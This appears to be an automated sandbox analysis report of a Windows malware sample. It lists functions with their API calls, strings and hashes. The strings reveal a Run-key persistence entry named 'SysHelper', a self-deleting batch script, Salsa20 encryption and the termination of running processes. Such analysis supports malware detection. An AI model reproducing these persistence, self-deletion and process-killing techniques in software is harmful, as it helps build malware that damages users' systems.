                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2158581194-0
                                                                                                                                                                                                      • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                                                                                                      • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00420FDD, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __wfsopen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 197181222-0
                                                                                                                                                                                                      • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                                                                                                                      • Instruction ID: 060863096896a5b816ca94ba1531ddaea04f54b188c1fa908ac11e743c0bd32b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1EB0927254020C77CE012A82EC02A497B199B516A4F408021FB0C18571A677A6A09A89
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00412900, Relevance: 1.3, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-000003FF,-000003FF), ref: 00412966
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 626452242-0
                                                                                                                                                                                                      • Opcode ID: 8f4b302a109149e1c86236d96d5ec9546fa84bf7a53b70ad92479d45d1ec3e12
                                                                                                                                                                                                      • Instruction ID: 3b43283c781d39060a285e1a990033b4cd03b7dd602a36c1420ec248ee7b7319
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f4b302a109149e1c86236d96d5ec9546fa84bf7a53b70ad92479d45d1ec3e12
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0411B171A00219EBDF00DF59DC41BDFBBA8EF05718F00452AF819A7280D7BE99558BDA
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                      Function 004822E0, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,00454B72), ref: 004549C7
                                                                                                                                                                                                        • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                                                                                                                        • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                                                                                                                                                                                                        • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                                                                                                                        • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                                                                                                                        • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                                                                                                                        • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                                                                                                                        • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                                                                                                                                                                                                      • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                                                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                                                                                                                                                                                                      • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                                                                                                                                                                                                      • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                                                                                                                                                                                                      • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00482436
                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0048243D
                                                                                                                                                                                                      • DeleteDC.GDI32(?), ref: 0048244A
                                                                                                                                                                                                      • DeleteDC.GDI32(?), ref: 00482450
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                                                                                      • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                                                                                                                      • API String ID: 151064509-1805842116
                                                                                                                                                                                                      • Opcode ID: 0c9c1c2ab8505d5d0ad1ff410e0c07bd783a2317b8dbec5b469f5910e3c33601
                                                                                                                                                                                                      • Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c9c1c2ab8505d5d0ad1ff410e0c07bd783a2317b8dbec5b469f5910e3c33601
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004382A2, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 004382B9
                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 004382CA
                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: InfoLocale_wcscmp
                                                                                                                                                                                                      • String ID: ACP$OCP
                                                                                                                                                                                                      • API String ID: 1351282208-711371036
                                                                                                                                                                                                      • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                                                                                                                      • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0040C070, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • input != nullptr && output != nullptr, xrefs: 0040C095
                                                                                                                                                                                                      • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __wassert
                                                                                                                                                                                                      • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                                                                                                                      • API String ID: 3993402318-1975116136
                                                                                                                                                                                                      • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                                                                                                                      • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004124E0, Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00412509
                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 0041251C
                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00412539
                                                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041255B
                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 0041256E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                                                                      • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                                                                                                      • API String ID: 2372642624-488272950
                                                                                                                                                                                                      • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                                                                                                                      • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00411900, Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00411915
                                                                                                                                                                                                      • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                                                                                                                                                                                                      • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                                                                                                                                                                                                      • lstrcpyW.KERNEL32 ref: 00411962
                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                                                                                                                                                                                                      • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                                                                                                                                                                                                      • _memset.LIBCMT ref: 004119B8
                                                                                                                                                                                                      • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                                                                                                                                                                                                        • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                                                                                                                      • String ID: failed with error
                                                                                                                                                                                                      • API String ID: 4182478520-946485432
                                                                                                                                                                                                      • Opcode ID: 172b79915ac33bd678d32bde4226a0e24b826fa270b4d7bd6214eb3b2e5526ac
                                                                                                                                                                                                      • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 172b79915ac33bd678d32bde4226a0e24b826fa270b4d7bd6214eb3b2e5526ac
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 004635B0, Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _strncmp
                                                                                                                                                                                                      • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                                                                                                                      • API String ID: 909875538-2733969777
                                                                                                                                                                                                      • Opcode ID: 84ee3cde42700812759a9ef38857a16d989f8e96272b56e8f3a280f090e98fcd
                                                                                                                                                                                                      • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84ee3cde42700812759a9ef38857a16d989f8e96272b56e8f3a280f090e98fcd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00412360, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61registrystringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
                                                                                                                                                                                                      • _memset.LIBCMT ref: 004123B6
                                                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004123E7
                                                                                                                                                                                                      • GetCommandLineW.KERNEL32 ref: 004123F4
                                                                                                                                                                                                      • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
                                                                                                                                                                                                      • lstrcpyW.KERNEL32 ref: 0041240E
                                                                                                                                                                                                      • lstrcmpW.KERNEL32(?,?), ref: 00412422
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F
                                                                                                                                                                                                      • SysHelper, xrefs: 004123D6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                                                                                                                      • API String ID: 122392481-4165002228
                                                                                                                                                                                                      • Opcode ID: 06da7c2837e38599fef00ce52c1f6902c681b54622b65709e13af315f42eef8d
                                                                                                                                                                                                      • Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06da7c2837e38599fef00ce52c1f6902c681b54622b65709e13af315f42eef8d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00418000, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                                      • String ID: invalid string position$string too long
                                                                                                                                                                                                      • API String ID: 4104443479-4289949731
                                                                                                                                                                                                      • Opcode ID: 792d112af0fa9ddc9baf780d6e55906f8cf88b841c6546fcd7dace90299be161
                                                                                                                                                                                                      • Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 792d112af0fa9ddc9baf780d6e55906f8cf88b841c6546fcd7dace90299be161
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0044F26C, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0044F27F
                                                                                                                                                                                                        • Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F294
                                                                                                                                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,0044F299,?,?,?,?,?,?,?,0044F299,?,00508238,?), ref: 00430F1F
                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0044F2AD
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F2C2
                                                                                                                                                                                                      • std::regex_error::regex_error.LIBCPMT ref: 0044F2D4
                                                                                                                                                                                                        • Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F2E2
                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 0044F2FB
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0044F310
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                                                                                                                      • String ID: bad function call
                                                                                                                                                                                                      • API String ID: 2464034642-3612616537
                                                                                                                                                                                                      • Opcode ID: 0f15716b166695e00864247e1df175f35371e0258770e6daacd70fab21cfce16
                                                                                                                                                                                                      • Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f15716b166695e00864247e1df175f35371e0258770e6daacd70fab21cfce16
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00465480, Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                                                                                                                                                                                                      • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                      • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                                                                                                                      • API String ID: 1717984340-2085858615
                                                                                                                                                                                                      • Opcode ID: 73675a20a9300cbfb3356ca09084d0b3dfcbde4a4269266388fce0caa3adac80
                                                                                                                                                                                                      • Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73675a20a9300cbfb3356ca09084d0b3dfcbde4a4269266388fce0caa3adac80
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00412440, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004124B7
                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004124CD
                                                                                                                                                                                                      Strings
